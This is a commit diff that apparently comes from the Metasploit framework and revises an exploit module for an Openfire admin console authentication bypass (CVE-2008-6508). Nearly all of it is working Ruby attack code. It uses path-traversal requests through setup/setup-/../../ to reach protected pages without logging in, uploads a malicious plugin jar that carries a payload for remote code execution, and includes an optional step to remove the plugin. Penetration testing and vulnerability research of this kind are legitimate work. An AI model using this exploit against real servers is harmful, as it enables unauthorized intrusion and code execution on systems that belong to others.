changes on openfire_auth_bypass

unstable
jvazquez-r7 2012-06-27 23:15:40 +02:00
parent 6ec990ed85
commit 245205c6c9
2 changed files with 42 additions and 52 deletions

Binary file not shown.

View File

@ -16,29 +16,27 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits an authentication bypass vulnerability in the administration
console of Openfire servers. By using this vulnerability it is possible to
upload/execute a malicious Openfire plugin on the server.
Because of the file/format restrictions for Openfire plugins, it is not possible to deploy
a Java payload, instead the native payload is stored in the changelog.html which will be
renamed/executed by the plugin.
upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
code. This module has been tested against Openfire 3.6.0a.
It is possible to remove the uploaded plugin after execution, however this might turn
the server in some kind of unstable state, making re-exploitation difficult. You might want to
do this manually.
This module was tested against Openfire 3.6.0a.
the server in some kind of unstable state, making re-exploitation difficult. You might
want to do this manually.
},
'Author' => [ 'Andreas Kurtz', # Vulnerability discovery
'Author' =>
[
'Andreas Kurtz', # Vulnerability discovery
'h0ng10', # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'Version' => '$Revision: $',
'References' =>
[
[ 'OSVDB', '49663' ],
[ 'CVE', '2008-6508' ],
[ 'OSVDB', '49663' ],
[ 'BID', '32189' ],
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ],
[ 'EDB', '7075' ],
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
],
'DisclosureDate' => 'Nov 10 2008',
'Privileged' => true,
@ -55,11 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'java'
}
],
#
# Platform specific targets
#
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
@ -80,18 +76,19 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(9090),
OptString.new('PATH', [ false, 'Path to the Openfire admin frontend', '/' ]),
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)', nil ]),
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)', nil ]),
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)', nil ]),
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
], self.class)
end
def check
path = datastore['PATH'] + 'login.jsp'
base = target_uri.path
base << '/' if base[-1, 1] != '/'
path = "#{base}login.jsp"
res = send_request_cgi(
{
'uri' => path
@ -112,10 +109,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Detected version: #{$1}.#{$2}.#{$3}")
version = "#{$1}#{$2}#{$3}".to_i
return Exploit::CheckCode::Save if version > 360
return Exploit::CheckCode::Safe if version > 360
# Just to be sure, try to access the log page
path = datastore['PATH'] + 'setup/setup-/../../log.jsp'
path = "#{base}setup/setup-/../../log.jsp"
res = send_request_cgi(
{
'uri' => path
@ -123,13 +120,12 @@ class Metasploit3 < Msf::Exploit::Remote
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Vulnerable
end
def get_plugin_jar(plugin_name)
files = [
[ "logo_large.gif" ],
@ -155,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote
jar
end
def exploit
base = target_uri.path
base << '/' if base[-1, 1] != '/'
plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
plugin = get_plugin_jar(plugin_name)
@ -165,12 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
#plugin.add_file("readme.html", exe)
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
plugin.build_manifest
# Upload the plugin to the server
print_status("Uploading plugin #{plugin_name} to the server")
boundary = rand_text_alphanumeric(6)
@ -181,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
data << "\r\n--#{boundary}--"
res = send_request_cgi({
'uri' => datastore['PATH'] + 'setup/setup-/../../plugin-admin.jsp?uploadplugin',
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
'method' => 'POST',
'data' => data,
'headers' =>
@ -195,24 +190,19 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Warning: got no response from the upload, continuing...") if !res
# Sometimes the server needs some time to deploy the plugin, so we wait...
1.upto(120) do
break if session_created?
select(nil, nil, nil, 0.25)
end
# Delete the uploaded JAR file
if datastore['REMOVE_PLUGIN'] then
print_status("Try to remove plugin #{plugin_name} from the server")
print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({
'uri' => datastore['PATH'] + "setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
'headers' =>
{
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
}
}, 3)
})
if not res
print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
end
end
handler
end
end